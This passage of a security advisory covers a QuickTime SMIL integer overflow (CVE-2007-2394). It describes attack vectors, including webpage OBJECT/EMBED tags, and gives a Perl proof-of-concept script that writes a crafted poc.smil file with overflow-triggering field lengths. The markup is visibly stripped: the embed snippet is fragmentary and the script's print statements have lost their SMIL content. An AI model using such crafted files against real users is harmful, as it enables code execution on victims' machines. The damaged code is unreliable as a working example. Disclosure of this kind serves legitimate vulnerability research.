---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the later scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used: SRC="available-sample.qtif" QTSRC="poc.smil" WIDTH="10" HEIGHT="10" PLUGINSPAGE=" www.apple.com/quicktime/download" TYPE="video/quicktime" /> ---------------------------------------------------------------------- PROOF OF CONCEPT ---------------------------------------------------------------------- #!/usr/bin/perl -w #### # QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC # # Researched on QuickTime 7.1.3 on Windows 2000 SP4. # # David Vaartjes #### $file = " poc.smil"; $padd = "x"; $cop_len = 36; #### # By choosing the following lengths the # integer overflow will be triggered. #### $tit_len = 223; $auth_len = 65280; open(FH,">$file") or die "Can't open file:$!"; print FH "\n". "\n". " \n". " \n". " \n". "\n". ""; close(FH);